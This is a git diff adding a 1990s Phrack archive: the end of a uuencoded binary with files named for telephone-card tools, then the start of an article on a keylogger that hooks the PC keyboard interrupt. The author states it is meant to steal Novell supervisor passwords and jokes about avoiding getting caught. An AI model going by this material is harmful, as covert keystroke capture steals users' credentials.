+M(72!0L)$BQ"P;;J,K#"BX9!KJ)592([*/ZE\T6TZ_9.P;VSVC>-T,`?S-_[_
+M:1^ZI7-=SP/?#P(@A%:JLA(/S>RX+IT%SZ-_^C[],PC:.0K=CMGQGCD[-MT'
+M6K;L5K.B$@V=4ECC%,[*OFXY%W+WZXJY7\S5Z2"Y*Z_BA(HJP%6^I]S7/OY0
+ME]RR38$=TA);7'52?6[2(J5_3RZE*H<2ZE_[NWLH'R8EY4FT3?[B"C1+]T6R
+MZW"Q7:NKI(4H@\!EQ6U<OQV'"<V&%_?[_%;W])1[`UGEP>=\-MSRK3[V8BZ:
+M?RD!`K8AM,9*4*E]11,G8!O%LA_LUACZ6?!7`K!IA0>NL:D_JVB[K:;KHC^Y
+M%`T<?7(7)3N>>J9!I<.+Y,*+^_1>^Y1Q49%FRN2%8(T57TV="2'<P':@+/Y_
+M:"::J`,K]+3&'8ND!!]8#6=)VF-?J4D;`B[M8_5#]2>+BTT2(TPV/^63?;:#
+M39;>M7/^7[#:QE'69OWU$]_E?+HZY].2I/>T2HQ$E3JCBHM**%OR$S:NLCWQ
+MY2EGM4.UB%_G&_9EQ;%-><DI]%=4]S7+#M?1[@\@')3P'#BN(6K8<YL]K`MU
+M4*<P9+/R4)>]%,E=S%43L<&QQHCC/4MDC>T#\Z(((33,:KVN(*OL<D8+1_*X
+M*)+=#6=1XO`,&2[+P=R&JRM/V5Z'UFX(V'59)=O8.]:9Q%ZL,D=+*?TTE"[B
+M@E6;0Q^660D8%3&<TZF(*X(]GFG"Y3F*HD!5PP+!%7Q1P\N4^Y1R2699I8Z1
+M<J)0/C!0'O`TEE*BHZ%<W-)CR@<FRD,@-N9BX3S/]>I)7&QQT!Z4P)@_`I&+
+M&2H^$E)S,?N>`?4I$%ZW4`'"IR%J(/X]0QI0)#R/DF`U2/(\MD@#CC0$Q[*D
+MV`0K"L)K;:W%)A2).%6@J4AAE=Y_XG`CFCJ1`CNL$@@O,([R"`M</V)P8TJ=
+M-*NL_$>A;H6IXPJ/6B1:+185\%W9ID2G`3J&?,93P;@,"!.*#[L(A-)'%,JV
+MZ&(@DR!HO7HQ\*&&1BL7^!`#YSL;1U&;TI_A=$8+7ZM&JM[V!8[_'+UMVT!<
+MN3B>U^\@4)Z//&I2B%P!-%E*E"9DH215//WP>>)INV"%"K$]<24W#XQ8^;S*
+M*:<PW<6,CR'=2.=4&+17%5:@HB+,)/BTF<`DE-_N4VKOUW2AKS]5;/.EM[;>
+M5]_:LAB8U<<R(YQ"3'9\_529F>Q6&1TA>\2G@RML.Z"02'8"6X%49:>!1+(S
+M$]%#L`98&P4M_ZWCU2;_J]%&1VTF8A17Z+4VVN^*9`M)\;J1SA[8H2RBK%X*
+M[Y$::6VPWZ80[=9P$Q>0TSSL'645IDJ_X<A]C4@'WC-%>@#$QE(2J):Q$NDF
+M-UU;#+6(L)7J(1"B0`O:0H9NLO8H_#Y*\JINJH0<:11%\%Q%08U)ST*@DJ*H
+MW1J+>8Z-0U85#$@EI0R1&1$I]R#IBU8_R.?"!/U0/3*7QQ"NYQV=?Q[:4&_K
+M/HLI'`(D#-'*"9U<%YM\):Z<$,R.5W]`LM%D4*@)8.`VV*$0;*V+K["`2!M3
+M/CE_)/<*=D(#(7?WVYAJ4H;O:#A:\*[,',T/+W/8"I-%>6N&=EP-0PO>UF<P
+MM.-I&#I49>1)#.WX0(9RZHL76PG+ES,Z61[LJ#Y@52\?W0;J,F`LIJ19.S4`
+MI*[=9`.[M`"6O/TW#09=1V5/5-\]1(FH\%@W(5BDAP8@2&CK.<F)/*U2:HGO
+M:9S&GN2#&IQ&'F]+<N8WQFLJG\PUH+XC0^[+TU`7A&%YUWEZE;PC:]6F,4OT
+M`5BAG*_E16'(D<')VU-X&Q>PT29L2]2AS!1U-9E*,W:/!)K9(X8VTJBAWC-M
+MDS,&XF%YZZD^[`%Y:^IN2\0S(`Y6S#U5W+CV/6J*W4\;H:7AL3I*P_>NK@6.
+MN%>MJ]`4MI+;T).0T4VR@LO]W74Y[G\25>X8/-'QEF2=JG62#Y!*Z\0>,30:
+M)NG+GH^8`&J(C:).8FT#L8Y*+!%R6T\DU@7B(A8E0FQ<6?\&;?PQ7NV+6$.@
+M!R1`#$"$@&P-J3)`Q47R^D<W4;+CWIGKJYJ<"`5^GZ7)78V^)4+EO%G?U@?5
+M62AWFZ;WWW16J/'>0FKV\>0$392X-OO5Y#0'CD2[H?A"+O6'73F0(!K1-F?`
+M.K$ED]&:B[)1TX+!]L&1@YE5N9OBM%F/=-K<@>JT$:&'ISAM)=I0.4?.ZNB$
+M>#"-^G85T7$<7!Y25<W)DZ%QBVFYW/-X;TPW^[)>HU5U6%18].FHK0SCFWVQ
+M^(M=DL`@SRB#R>$I5H:'_$H6ACIJZ\($OS)C/EJ2`SUK13$]FI/R$'\)U7LU
+M?UU.I2*SQB4Y@IRZE1PWC__<Q[L5UQ4>H0$$>2='!#M<VUTUOD?M+OOVEVB[
+MK\!H^K8GQTZ)4#(E)G'D+%S#7?P1`W/4R".QK:=''CU7M5U$V+R:;==B?UUD
+MT:J`[\I'+'<AD.>!9<L50R5JJ[?S_74[UB-+0*4APT:5L-(UMBXGO`J9A6S)
+MR'+HB@]:9$%][_Z"=K%MU?_\*\[25J-4//'EHR[^?R#JXH74G97+7XBM1N-Q
+MC3QU9YE/2"-<MU$.WY4M:-B2NX\,NB>[,!Q:#<>K'B=GULU^NX4/C/<1<!^(
+MBW8FQ-9Y='AGP@.(.K?>&P!1]+8=-#R`?#K1:C%AD`Q!BZK3WT)-4Z6_-2FJ
+MBR1GIV#ZJQ7=0R;Y;;P^JML7*>3Q;MUQPP;A14HE!2.-^G&L1I$]3?V,9:^1
+M@ZF.&2[7I!5/]Y\@*2CEU4.&1R,</7DO11QUQX-+(R4\_I#"^1:%0TI<*%<2
+MX>3:"`3'[:%/P!&3%1Q.(QIR&U9#&JWA'3PDQ2U\YW-#Z-M4G>&Q>EIU1B1U
+MUBK)$JI1DM60'2`]ILJ"88LJB`+79#"<CT=B-05390DS@?&?^VA+1]Y0Z@$)
+M%4QQ>V/"3#.XR>*HB+,C*&[C'3>*)33?.$;E,]Y#`-9062A!++CAT2S4/&5I
+M.?Z`JIZ\B.\A2VYNN?OEASKDWI=`[FF0:6')\Y&I$VHA0R=4I31\MA&;*'RV
+MX6`#L#R%S):@:+=N9>"("&#]W;JBD>&]DW.?_I"&#S"N&CY0AR\2*0C7")PQ
+M"J,0MQ6N:+TVA%'ZZW;,5>3$'ZOI-B*431Q*MZVIFUF7+PBY-_^,*D\+X?K*
+MH-4,#56>%)4%>'09&I;IL:R>G,$G0KF%J*U$I[SQY8K:G7,X'E57\@&&$D\3
+M04!G'!`;E8\9FDWY"*]/3\M'1,M'!`&VFBIL`#U+T534,$VQILKXS7%)7KE>
+M3*_DM\FF8+M2WH$'U@C/IT>@1*-I%LBVK8"B^61`_/M&/K?QAHMGX-,T#YH)
+MH=*B3O.H,\'2/.P0#I\/GN6A(^#`=%LN9%XXL*/L.>H!&-S0++Z/HZ))(4%2
+M)7J"$,B9,A]N,\%U_):-^ZB]<4O8)M$OTTTU,S1P607?@QX0=/2^A%:#X^JF
+MCCM+\IF>$J^O<;XTA15/<[Z"@<;Y$BHKOI[SY87<^0J&0,[P3M7K-9:S7H)V
+MI\J/&0E+T)XIJD,.2=YNA8,1V"%6?(([(FQ;W\TEH>I?TVL%'AAP>A]7I>@)
+M8ZQZGQ2,@0PQ^4*YA4J^LM%N3UO)=)_IZ+:_$-VA!58?;SR$ZHLFDZQL/)JT
+M+]W:T-L6U(AW2#2;#Z$>X_&;C^.&4T-;P_^^*D]/X__0T?"_4+SQ]?B?7\;"
+M3++J0?MALZQ/\Z!#&A#`NP^A%*/VH/D&H]7$.@]:V(2$OIH8(7(9AB$Q(A(I
+M;$_#0$.G4,CP"#HK-(74$,B0V="P#5P(]0S7.^XME:^/15<-V=!=?!/1,XE'
+MC+WI-SR]P[KH:U2[4-3P5-4>ZO;5@=N0^)FLK=M7"Z;TZ[%VX,.+KQ#J"?ZN
+MH^Q")477"67"KY7YTL,.GSCLQ:\7@^DY+/N#<S:H\_Y@+-]IC3[-\/%MR-K#
+MT"%4#=7:.&W#12<@/YW-&W8"\H/'M*%\(8WA)GS:$-V?9>Y:O@3"<#\_;2C?
+MWZ-M:+&&\N7/VH:]LB&.`6E/)].&^#"LL6M\1:BY(;J`Q_`K"*QA]\+PH_EE
+M0W0,WMPU.MK>V5`\>*UM.*P:2BD'TQ+B4^I&-L-Q&^U%4;1K?&NIL6M\6:JQ
+M(2Y=,'(/OB79*(4X!]R)*%;*:4]V<AKE4H6.KA\IA?@J%B.;X4H4K<S0RFI\
+M&;"1S7#$P]@U]FZT78>\H>1;:,O**(WXCC\C/^+HB7$P^$"8X:<;:$,YN:I%
+M'/"&AY?0K1J*-[\9UQK?GVD4!7QH2GOX)FP;=O`X2]VRAM*I-?-@YC-XU,K@
+M.GKMA-/2'7RYMG$)#PRY/D)=-GP,(J41WW!M[!H'E@R7Y_&&G0H76%KE2_M"
+MO6?X0G#,+G)/=OMX_32_".<XM8,=\%F1MN):N:?<A0\R&24`7Z%F7#E\(UH'
+M8N>@6P<*_T2#MB%E;'P?M=&5P+]`I/.AS\ZJABH+&!I*L1>UH=,TQ/?6H(9!
+MW5#Z51_SA*-#O.:&Z"R1X?HBWK!;H"O]B7\'Q2CW^.I5,XV'?+R&>]"%J6;N
+M07>AFID"78UN;(BO,NYJ>-B\6*RA?*^H<1[Q#7UF1!2&UNI/NM;X<G`C4^`+
+MOXU,@9/3QB7$U\D:32"^C]E,([J^VL@4^,Y9(R+^N23C6N.LM];Z#JN&W:S+
+MCL[QAOC<L])P7#4\I`#(6=50O!%'ZU4W#84;>;0-6=>/L>=T"?'Y4^.$X^.>
+M1C;#OR=CE!G\NQ]&?L3W^1L'@Z^R-"+B6RF-_(BOES2R&?XY$F/7O\&A#^OZ
+M"_M%Q/I;_"+\&QO&>:;_NQA?3.>_PM6"$GS1G\'WK]^_AI_@*J?!17A]S/Z#
+MU4O]P,NN+`O>P/OCX^/W]:?\-[Q'G\-?5*7C;S[C50U6E3Q!:)2R8_0Y_`7%
+M&E*LI[^JP:HNB.*4T6E[%IK-Y^SIK^HI(Y8P9\]#L\F7I*R_W4):W,89W'%A
+MN:9W,^:P9ZQXPIF7W2=+TWAO&%<W]]/D[`MBOWIY$>=Y=!/G38M7+__Q?U!+
+M`P04````"``SH"T=Z\G1\\0```"U`0``#````%1%3$5#05)$+DY%5'V0,:O"
+M,!1&]T#^0T8=`KUIDG;5H%!L;:%]4!"18`<'!:E._GIS;WC0E^$1T@SGW"_Y
+M>N+,0=@.5&8Y4TH\]YS%=>8,L?H7_X3IOJVAY*RK'%A7ZD0(\U7?%B6$@/[A
+MY_?5SY/H_/3Z*XXAJ:EK'0XMFMM'C'+P]X6SXNRX&RY9E@'&2HVW2X,-Y`8?
+MBM_UTE/D*?*@2&!.T$08LW2B:%)L5/($&H(%P:BDAB6C));>'N?`8&]YH`[;
+M1(F#^-O&WX)1^0)02P,$%`````@`ET`N'45;^#19!0``/@T```P```!414Q%
+M0T%21"Y00T)]EDUL$T<4Q\=Q`B8RWIDE+16BE=M#A%8">9?%F`]5@7RHII!8
+M2<I'9;5RXMDUK1L[MBL$JBH5H0KU8%7@0\FA5"B'7%I5:EI%%6DIAU4/'#CE
+M@M43H`I!#S2TE@A6YZWC]1L;:FED^?=_[\V;F3?C=_8L.44V]QZ83,W8N9V)
+MP</AX?3'TZG2Z=Q,*AL^;NS2]?`$+YSFQ7`\OKGW^/#X1'QL-*R'S?#ATS.I
+MPMG-O=O("S\^/_F?CR](M.#]Z5+?NR7X]AO$3]XQB$(F/DH52M.I0CJ<2*6+
+MQ$=(@,0GQO;&]"CY@?X[6U<NYX-;/BUV$>+7P$DGFT@B/JA'!V,FF&\@$V-'
+M]1BYSE;Y,GV2?J;>M03V[Q3&)W42)&;X6.9<^.3.R52V87_LZ%%3)QFZRJM*
+M@3^@J[9(W;]#V`_J0C:,<'X$+#>2P4'=B$2)H:SR[T/O\PW4MKJ;IL8+3!WK
+M^Y!N;:#[[!Y"NOM`[?J&5'N(S_=/*)!W=Z/[)=)%3-(U27X76^.;8JE98;7.
+M=WN\3C$W/#XG<=WC48GO0?%_+;1X%,7'?"^*CWD,Q6_RE\4.Z!'2M8TD0+BA
+M7K<(K-1UV(?X`&]PUT'WA++GX`J&)R2E2#'DT(RTGJIG+\VPVQ,T>0;3$VI,
+M$O9X@B,+44^HR$)K\BE9:&4;87@549047L4>E!/F)DH)\]TH(\P-E!#F.LH'
+M\T.D:X:,`,_0WT2>_G7^-N*KO,6%_0`9``X70<!U?MCC2R_DCHC?\YPXZWR3
+M(B[H064T7Q7#O1HN&5&&!!E"9(>R7Y#]$HD($I%(OR#]B$#A3[%$$9-$L2:1
+M&@O/R@2N19V>E\CYHJ9BHJGA69G`I9FCBQ)9+"953)+"2R9PI:+TOD3N%\LJ
+M)F7AU4YNYH#BR-_EDA+1U/F<)I$:F\_!:O%N:+.-QP>3K!AX%4Z^\>"T2"4/
+M%).I/%"9K(C1(K<Z2%DM9<IJ,HMSOIC1U#<1J;&+F1K#1%//V9KZDXUM;ELU
+M]A4B4*>-&FN27\2O(Q2316'SGEOG35)AHU:%?8ULZA3(*")?TNL6T!9QQ/^.
+MPQ80^80"P9$U];8%>>/S&K>3:AF1-35KK:D:(O!::&H$14ZJ1WA2K:/(:T('
+M3^P%1/8:M]?$P%Y:&RFK%^S8E@M2AG4>VX+G@E_M-A]DDNI;TGF5[1J[E,'Y
+M7!/G]3,BL.ZD.'MY]K)$H%H<AJO%8==L1XKLL+E<N\VEC,-,E,\4NR`J_#&J
+MWJKRN(/`N]%.*@R_)!6V_\,*NX$B5]@?-E"\]EN\)E7"`PKD%MK#![2:!BH3
+MAU73>!5`CDB5.<`K;$XB<Z(V,#&4Q73C?6[%*=NP:]+MMH%BXEA`<>1K8EU_
+M(M+/3+LBQ3$4TP:*B6,!Q;NQF*ZQ:%N&0'&&9A9.$<]^(ROO?(UI67BY<$69
+M64V\=[BBS&Q2(O"NP"O9(I'@9&FF;[+4(C-]#Z=E$@D^G`8[F8"=2P*OB>9T
+MU_CPR-#P!#E(2##030\6ZTJT>)ZZ'6I@NV@*=TV>2@PWY"B]DH]0:&#OY#OD
+MWD"<S?,A=I4_4^]Q7T=X7V^@3@=$3WN`^]FR:X#]A7R/WN3S=+G9PG;ZORH,
+MJLHR?X/NL\#@%?=?WI4^HV?X`"WPS^D2[_05R1&EWWH:>MTZI[A-;WON1#G#
+MG[H]\1+O7@]]J"']&+HCVN45_BBTW>J0OA7M\8+U*/27U?.\H'$Q)W3/7[CR
+M<Y*J"8._15)N>[TQ0`+=Q.ULMK(GZ3J%$>);68@+B8$DUG:5;K=T=URQKHK1
+ME,0XH:SP$XIJ77;'BN?5`]*"=4*Y*S",!>L_4$L#!!0````(`/92,!W$D[.D
+M0PD``"#(!0`,````5$5,14-!4D0N4%).[=V_:B-''`?P75RH":<'D$%="E?.
+M'80+!)L+^`72I$^=PAQ7.EB0%].CZ!%4JC#:Z(]]EG=G[;E!N_9Z/M]"K&3D
+MXE,,W]%J?II<37[^Y^.O7S:/OUQ-SKY].C__<W+V]?S+Y.SOCY]_^ZN0YW/O
+M=%L=-:OBO843IPZ<KH_[7S\7G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#C]D%/+-WTX<>+4H5/SE6U&G#AQXL2)$R=.G#AQXL1I<$Z-
+M/?"<TS4G3AT[+6JOE'-.UYPX<>+$B1,G3IPX<>(T1*?R8`^\Y,2)4S].\\.G
+MG#AQXL2)$R=.G#AQXL1IN$XGNSWP7<&)$Z<>G6;;RU-.G#AQXL2)$R=.G#AQ
+M>MM.FQW>?U6U'E?5ZK*J%IPX<>+$B1,G3IPX<>+$B1,G3F&G_9WB-2=.G#AQ
+MXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)TXP3)TZ<.''BQ(D3)TZ<
+M.''BQ(D3)TZ<.+V_>3VA<.+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$
+MB1.GMQU.G#AQ&K+3M'J2!2=.G+IW.GWZEP4G3IPX<>+$B1,G3IPXO?%S0`M.
+MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXI3E?-]R;E[/-2=.G#AQ
+MXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G%X_G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$Z>FTZAZS+S@Q(E3+T[-MRPX<>+4N]/!BL6)$R=.G#AQXL2)$R=.
+MG(;C-*[:PXD3IVZ</@3?Y_,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
+M3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
+M3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
+M3IPX<>+$J1E.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)T_'#B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$
+MB1,G3KDY/1].G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G)X/)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
+MQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
+MQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
+MQ(D3)TZ<.''BQ.GXX<2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
+MG#AQXL2)$R=.G#C%AQ,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
+M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
+M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
+M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
+M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
+M<>+$B1,G3IPX<7K-<.+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
+M3IPX<>+$B1,G3IPX<>K;:<PISFG&*<9I-.<4XW2RX!3C5"XYQ3@5*TX13K/B
+MAE.$T[RXX!1R.JEV6>Z=-JOXE-/+3N4RI4#EY[19Q1,*5!9.L_N+O=--2H'*
+MT.DBI4!EZ#1-*5`9.HU3"E2&3DD%*D.GI`*5H5.94J`R=$HJ4#DZI12H')U2
+M"E2.3BD%*D>GE`*5B=-^)WSOE%*@<G1**5`Y.I4)!2H3I\7^:N^44J"R=$HH
+M4%DZ)12H+)T2"E263@D%*DNGA`*5I=.V0%6-W'&J.96;`L7I9:=M@>(4X11<
+MQ4\YU9U^YQ3E%"3AQ(D3)TZ<.!6<.''BQ(D3)TZ<.''BQ(D3IW?GM"[O3E:C
+MY7@QG5_.;HOUCFU[.VK[?8/M/:G=`R=.G#AQXL2)$Z<7G1Z^T\.)$R?K$R=.
+MG+)V.N$4Y33B%.4TYA3E-.44Y71Y[^3S\>>=_N44Y?3TL"*G%J=RR2G&J7:8
+MFE.+4^UP/J?O]X.WUX]S_VO#'CBU.-6&AW!J<;K@%.5TPRG*J3;K@5/8J5QR
+MBG&JSZ+A%':JSS;B%':JS\KB%':JSU[C%':JU2=.+4ZU^L2IQ:D^*HM3T*E<
+M<HIQ:HSRXQ1T:HR&Y!1T:HP:Y11T:HRNY11TJM<G3G6G<7C,&J>@4V/2**>@
+MTY+3"TXMX<2)$R=.G(;N]'`^8\Z)$Z?>G(K'.0^<.''BQ(E39DZE\P@_Y.0<
+M$"=.G#B];:>'7?""$R=.?3E]S]ZI"H03)TZ=.AT\MSYQXL2)$Z?!AA.G5W;R
+M^7C3Z;&#S]UOX<2I'Z>#Q>G@FA,G3IPX<>+$B1,G3IPX#<QIMP%><^+$J??U
+MZ0,G3IPX<>+$B1,G3IPX<>+TWIT:OP?$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
+M3IPX<>+$B1,G3@.X'_SD=TDX<>+$B1,G3IPX<>+$B1,G3IPX<>K$R;Q#3IQZ
+M=VI](R=.G#AQXL2IX,2)4[)3U9H[3IPX=>.4&DZ<.''BQ(D3)TZ<.''BQ(G3
+MD,.)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQ
+MXL2)$R=.G#AQXL2I4Z?;ZJA9%>\MG#AUX%0()TZ<.''B))PX<>+$B1,GX<2I
+MB_PT.?OZQ^3J?U!+`P04````"`"*=B\=14[.>F0%``#,%P``#````%1%3$5#
+M05)$+E,P,9682V_<-A#'[P;\'8B]-^'P)0DY!(JLV&KL]6)7Z[B]%(9K-#DD
+M*=Q>TD]?OF;T('>UBP4$:H?DC\/Y#TGQ7?_T_:\?O^R>O[Q\>_KWZS-[@#>"
+MO[#=R^O7EW]8UUU>]/7Z^OZ/77/3WM5]US"PO_KR8G?3MCWC]@=@*LE*84IF
+M[/_=[RV34&@&7`.K5%4QK:MB^._RHN[[+5M=M;MFVVWZ[GZ]8F#8JMO=%Z4M
+M['Y^?_[RAMV]?/OQ^I,U3Z]_KCS5P?CEQ:_[=<.DX)QIX/BNM'T79GB7,[NO
+M+^E=BUE]Y=Z5>]_4VYY)X^I7]J%D91^%==%VIX,OWNTPGC`R].FAOMVW*U:Q
+ME6)W-_]-QAUJ//;UK:^0L[T_9+%SU5VOZ_Y^ZVL\PLH.R8W0N>U^$FOVOVW"
+M``+(UU+EO%8TSEB;;AV[=;/GIR24R-G)H-;UG44!9ZO[7>-')&(#&T0/LQW:
+MD=O6JT_6K$MGMG5`E&2/0"`@G`@4"(0LL$8@C(';MNEK9'+$:0>.D6_75U$"
+M/OI!![;(0%>2F8)K)HMC$H@J3F=W9O:!-EYVQ3P\^_<3>PDS^TP.>SL7Q@E:
+M)CV1'(CKW0(S5'1!"+[Z^3=8$DM!^+C?M:X_$1ND00!K+DIGGD<]`#D!7:E8
+M`CYL-LCC69Y$'L_R1(D\7UKD7:^O(L_73WDJ\D29YQGBF9/\:QKDF2Q/(\_D
+MYU/0?+H2+/&NZK[&"159H,`)%7D'*8"^M*B8[:Y'!_,!+-'!`P$D!WUID=?<
+M?D)>WK\">0?\HXP0)V7$YRWYET\(@[Q)0L15*62F4YHI<.E)5B6)&QF34+E%
+M3`*3%;A%[-BJ-%LQW'(MM8Y+GU'C)6/8PX1@?W_$BHY;F>S:TM0;K.4>OCNW
+MS6\;ZT19Q#U!:`9*LD*Y4=UVZ]8VD=8HK"&49*'#O$:K$=%3@SZ/K30/H2T?
+M;6)#`UF-FAX/W@?G0XD[F(I.#+%S]K##B3C!$3:,1`RP!:74#C;9+B<L9Y;3
+M[1+R2@!4@BI)">(<)8AQ@$]2`C])"3*K!#BF!$Y*@(P2@)0`&24`*0%2)0`I
+M`<Y2`BPH`7)*`%("G*4$.*X$.*($VDQEP243IO+=%4P)2Z@.2F'3-6":4ATZ
+M=>Y//8_NW7+B%B[IY9R5Q@"+FAUJ^F-@B3'R)7]>5TPN["<?;'>A96GG"+A*
+M3B#<5;!3I]R.,C]V!EYQ!D_'(_5!'IZ#$YXAGCF#Y\Z1YAC/'8--CJ>)I\_@
+M%:O8\A!/N@HYGB*>0EZQQ/,'GM#R$,\%6.5XM+K[D@KG@05>_&R0QX`NPC('
+M%`04^(`3@$X0XAC0A5CD@+1J^=*)$:R=X.$8SX48<CQ./'X&S_G'C_'*54`E
+MO!)7+5_R7T'*QG!!H1(SWG57B#FNBODNW'`4GR<\QX0_%2<PX?.X,J9[BJ//
+M&E\Z%0>8[WE<$;,]Q6G"Z3-P_&VW[C'E\T@3$SY%*D+25VRQA/2?5+%E%J=C
+MOJ<X23B).%C"W36W6TSX/$_%=$]Y@GCB]!FMU=MM[U<U<9@I8\:G3"`FG,&4
+MF/)YG(@)G^(XX?@9.($9G\=!S/<)+G[B#"<55>%J,_[$Z=O'GKFQTF7@Y!:P
+M<#H%&.XN/G?;-L;'D/;]K=[<@C%$BTX^)Q,+95*T^$.=\)X/MXG!4B679A/+
+MY'8+.;1MC>XJAU$/CU%OHXT`XD(VL0QW=X-%3[],\A:\,\#>:`L/I=&,XGOX
+M7AA9Z$9UN/$8>RKT.',32VBMIQQ!-Y#A9G88]<A2SBR3.Q[LC:XHZ+(BL=`R
+MC;VIY`(@M:@HD[%V_"-O(56-+(.J@L^CL:FI930V,9FW$(7_`5!+`0(4`!0`
+M```(``Q2,!V^G@!LQ@@``.P@```,``````````$`(`````````!414Q%0U)$
+M,2Y!4TU02P$"%``4````"`!*4C`=CCHX#\L(``#X'P``#``````````!`"``
+M``#P"```5$5,14-21#(N05--4$L!`A0`%`````@`FT0N'<0;&V`*!0``/!<`
+M``P``````````0`@````Y1$``%1%3$5#05)$+D(P,5!+`0(4`!0````(`*)$
+M+AW[.7CW$P4````@```,````````````(````!D7``!414Q%0T%21"Y#35!0
+M2P$"%``4````"`!K4C`=UE#(="T(````'```#````````````"````!6'```
+M5$5,14-21#$N0T]$4$L!`A0`%`````@`;5(P'=:1H<KU!P```!X```P`````
+M```````@````K20``%1%3$5#4D0R+D-/1%!+`0(4`!0````(`$!#'!UNJ^N<
+MP`0``&(3```*``````````$`(````,PL``!024-214<N15%54$L!`A0`%```
+M``@`:U(P'2C2B*Y<````?`$```P``````````0`@````M#$``%1%3$5#4D0Q
+M+D524E!+`0(4`!0````(`&U2,!TIRVCV9P```)`#```,``````````$`(```
+M`#HR``!414Q%0U)$,BY%4E)02P$"%``4````"`!K4C`=#LVE_>8!``"G!```
+M#``````````!`"````#+,@``5$5,14-21#$N2$584$L!`A0`%`````@`;5(P
+M'=V65G;,`0``800```P``````````0`@````VS0``%1%3$5#4D0R+DA%6%!+
+M`0(4`!0````(`&M2,!T#9[*E[!@```1V```,``````````$`(````-$V``!4
+M14Q%0U)$,2Y,4U102P$"%``4````"`!M4C`=SK(OU808``"#=0``#```````
+M```!`"````#G3P``5$5,14-21#(N3%-44$L!`A0`%`````@`,Z`M'>O)T?/$
+M````M0$```P``````````0`@````E6@``%1%3$5#05)$+DY%5%!+`0(4`!0`
+M```(`)=`+AU%6_@T604``#X-```,````````````(````(-I``!414Q%0T%2
+M1"Y00T)02P$"%``4````"`#V4C`=Q).SI$,)```@R`4`#````````````"``
+M```&;P``5$5,14-!4D0N4%).4$L!`A0`%`````@`BG8O'45.SGID!0``S!<`
+M``P``````````0`@````<W@``%1%3$5#05)$+E,P,5!+!08`````$0`1`-@#
+(```!?@``````
+`
+end
+sum -r/size 61640/45861 section (from "begin" to "end")
+sum -r/size 58373/33263 entire input file
+
+------------------------------------------------------------------------------
+<UUEncoded Part Ends Here!>.
diff --git a/phrack48/12.txt b/phrack48/12.txt
new file mode 100644
index 0000000..491a5e3
--- /dev/null
+++ b/phrack48/12.txt
@@ -0,0 +1,440 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 12 of 18
+
+
+                COMBOKEY and the Simplistic Art of PC Hacking
+                                    -or-
+                              KeyTrap Revisited
+
+                                  by Sendai
+                         (with apologies to Dcypher)
+
+NOTE: Of course I take no responsibility when you use this and get
+kicked out of school or something stupid.  Besides, why would you be so
+stupid as to get caught in the first place? :-) So be careful, and have
+fun.  Don't get stupid.
+
+WHAT YOU NEED FOR ANY OF THIS TO MAKE SENSE:
+* At least a reading knowledge of TurboPascal and 8086 assembly
+* A tolerable understanding of how the PC actually works or
+* A copy of Queue's "MS-DOS Programmer's Reference"
+* A copy of that yellow-spined "Indespensable PC Hardware Reference" book
+
+
+ON WITH IT...
+It was with a little dissatisfaction that I read Dcypher's KeyTrap
+article the other day (so I'm back-logged a few issues, so sue me!)
+I've been foolin' around with a version of this that I first wrote about
+five years ago during high school, and well, I thought mine was a little
+easier to understand.
+
+So I'm gonna show you my version, actually explain how the damn thing
+works, and hope somebody out there has their day brightened by using
+this program.
+
+Note that the only reason I wrote this thing was to record passwords on
+a Novell net. It will record all keypresses, but it really has limited
+use other than hacking.
+
+Fun fact: With this program, it has taken me an average of about six
+hours to snag supervisor on every Novell net I've nailed.  And I'm sure
+you can do better. ;-)
+
+
+PC KEYBOARD HANDLING 101
+Okay, a quick review for those PC newbies out there.  When a key is
+pressed on a PC, it generates an interrupt 9 (keyboard interrupt),
+causing the machine to look up the address of the 9th Interrupt Service
+Routine. The ISR is typically in ROM; the interrupt vector itself is
+not.
+
+A key recorder is a program that simply latches itself into the
+interrupt 9 handler by replacing the old vector with its own address.
+By doing this, every time a key is pressed, we know about it.
